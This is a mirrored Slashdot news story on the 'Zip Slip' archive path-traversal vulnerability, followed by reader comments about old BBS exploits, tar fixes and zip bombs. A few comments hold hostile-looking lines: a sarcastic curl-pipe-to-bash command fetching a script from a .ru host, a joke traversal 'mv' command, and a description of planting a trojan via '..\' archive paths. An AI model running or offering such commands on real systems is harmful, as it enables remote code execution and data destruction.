Slashdot Mirror

← Back to Stories (view on slashdot.org)

Zip Slip Vulnerability Affects Thousands of Projects (theregister.co.uk)

Posted by BeauHD on from the heads-up dept.

Yhcrana writes: Considering the video in the story makes it pretty simple, this is not something I would like to have happen. Apparently it is a flaw in the libraries that are being used by Oracle, Apache, and others. The Register reports: "Booby-trapped archive files can exploit vulnerabilities in a swath of software to overwrite documents and data elsewhere on a computer's file system -- and potentially execute malicious code. Specifically, the flaws, dubbed "Zip Slip" by its discoverers at security outfit Snyk, is a path traversal flaw that can potentially be exploited to perform arbitrary code execution attacks. It affects .zip, .bz2, .tar, .xz, .war, .cpio, and .7z archives.

The bugs, according to Snyk, lie in code that unpacks compressed archives, hence the "Zip Slip" title. When software does not properly check and sanitize file names within the archive, attackers can set the destination path for an unpacked file to an existing folder or file elsewhere on a system. When that file is extracted, it will overwrite the existing data in that same path."

17 of 127 comments (clear)

  1. I remember this from a quarter century ago by tap · · Score: 5, Interesting

    I used this to hack a WWIV based BBS system around 25 years ago. Heard about it from somewhere. What you did was place a file with a "..\..\" path into the archive and upload it to the BBS files section. The board would automatically unpack it on upload, or maybe you had to invoke a "download a file from inside a zip" feature on it, my memory is hazy on that. But it would unpack the zip, it would overwrite a executable that was part of the BBS software, and then when it ran that your trojan would run.

    Isn't a press release about this kind of like a press release about the concept of buffer overflow exploits?

    1. Re:I remember this from a quarter century ago by prowler1 · · Score: 2

      I know of something similar which happened to a few local BBS's where I lived but the vulnerability was a little different (they ran on Amiga's). Basically, after uploading a file, it would try and extract the file_id.diz file to use to create the file description from. By default, the software just specified the name of the archiver (LHa, LZX, arj, zip etc) and so the software would default to the current working directory which was where the file was saved to. All you had to do was name the file you uploaded to the name of the archiver and it would execute that rather than what it was meant to. The systems which got hit had the RDB nuked and most of the BBS admins thought they lost everything so they formatted their HD's instead of recreating the RDB and really did lose everything.

      This was one of those examples were using absolute filenames was the safe thing to do.

    2. Re:I remember this from a quarter century ago by ashkante · · Score: 2

      Instead, Windows Defender allows you to execute an exploit directly: Hole in Windows Defender You don't even have to be an admin!

  2. Re:Holy Moly! This is some seriously creepy sh*t! by Anonymous Coward · · Score: 3, Insightful

    You can't overwrite the userland unless you are root/admin. If you are and you are downloading and extracting random archives before even listing their contents you deserve to have your userland replaced.

    What's next in the security news? `curl https://not-an-exploit.ru/script.sh | bash` being dangerous as root?

  3. Vulnerability? by mentil · · Score: 5, Interesting

    I thought this was standard, expected behavior for archive files?
    Unzip software is supposed to give a prompt that a file is going to be overwritten, to mitigate that.

    --
    Corruption is convincing someone that the selfless ideal is the same as their selfish ideal.
    1. Re:Vulnerability? by Narcocide · · Score: 2

      The new way to break into the "security research" market is to brand and report on entry-level system administration pitfalls in an alarmist fashion.

    2. Re:Vulnerability? by msauve · · Score: 2

      Maybe we should go back to using .ARC, it avoided the issue by not supporting directories.

      --
      "National Security is the chief cause of national insecurity." - Celine's First Law
  4. Re:archive vs compressor by dgatwood · · Score: 3, Informative

    GNU tar rejects '..' path parts automatically, as does FreeBSD's tar. Does anybody actually still use cpio, other than for extracting the guts of really old OS X installer packages (pre-xar)?

    Either way, I can't quite decide who to blame:

    • App developers for rolling their own code when existing libraries exist.
    • Sun/Oracle for not making it so trivial to integrate C code that nobody would try to write their own implementation for something as ugly as ZIP.
    • Open source and free software advocates for license terms that make people afraid to reuse code that works.
    • Lawyers, because.

    In any case, I don't allow any .Net or Java code anywhere near my computers, so I don't care even slightly. All the C implementations have been secure for decades.

    --

    Check out my sci-fi/humor trilogy at PatriotsBooks.

  5. Re:Holy Moly! This is some seriously creepy sh*t! by Zontar+The+Mindless · · Score: 4, Insightful

    Or you could simply not decompress archives as root?

    --
    Il n'y a pas de Planet B.
  6. Re:Holy Moly! This is some seriously creepy sh*t! by Narcocide · · Score: 2

    Shhh! They've already thought up the brand name for this hack and if you ruin it for them it will risk sabotaging their upcoming IPO!

  7. Re:archive vs compressor by Narcocide · · Score: 2

    Ok, to be fair I'm pretty sure that tar was never fixed and GNU tar was fixed less than a decade ago, but your point still stands as essentially valid.

  8. Re:Holy Moly! This is some seriously creepy sh*t! by msauve · · Score: 5, Informative

    Oh, people have thought of it. The issue has been known for years. The only thing that's surprising is that there's still software which allows it, which can only be due to incompetence. Heck, here's a security book describing the vector (directory traversal) dating to 1996, and it was known long before then.

    --
    "National Security is the chief cause of national insecurity." - Celine's First Law
  9. Re:archive vs compressor by dgatwood · · Score: 5, Informative

    Holy crap! I just looked at GNU tar's version history. The docs have said that it skips ".." members since IIRC the late 1990s, but apparently it never actually worked, and they just fixed it in 2016!

    *redacted swearing*

    --

    Check out my sci-fi/humor trilogy at PatriotsBooks.

  10. User land == not kernel by raymorris · · Score: 4, Insightful

    User land is everything that's not the kernel.
    All of your personal files? User land.

    I take it you mean:

    Most of the time, you can't overwrite important system files unless:
    1. You're in the administrator group on Windows
    2. You are root on Linux, using a whitelisted program to alter a whitelisted file in a specifically allowed way
    3. You're root and using a 1993 version of Linux
    4. The last time you looked at SELinux was 15 years ago. 15 years ago, it was inconvenient to use, so you've been turning it off ever since.

    1. Re: User land == not kernel by Zero__Kelvin · · Score: 2

      Luckily having your system compromised because you are too lazy to spend the minimal effort involved in learning how to use SELinux isn't inconvenient at all.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
  11. Bigger than just archives by Chelloveck · · Score: 2

    Holy cats, guys! I've found that this same security hole exists in 'mv'!

    mv evil.txt test/../../Documents/Thesis.odt

    How many programs are affected by this?!!?

    P.S. Anyone know how to undelete a file? Plz let me know before Friday!

    --
    Chelloveck
    I give up on debugging. From now on, SIGSEGV is a feature.
  12. Check for the other one! by SuricouRaven · · Score: 2

    There are two great holes in archive formats, traditionally. This is one.

    The other is the 'zipbomb.' An exabyte of file consisting of nothing but 0x00 bytes, all nicely packed down to practically nothing by the compression algorithm. If precautions are not taken, guaranteed to crash your target be exhausting either memory or disk space.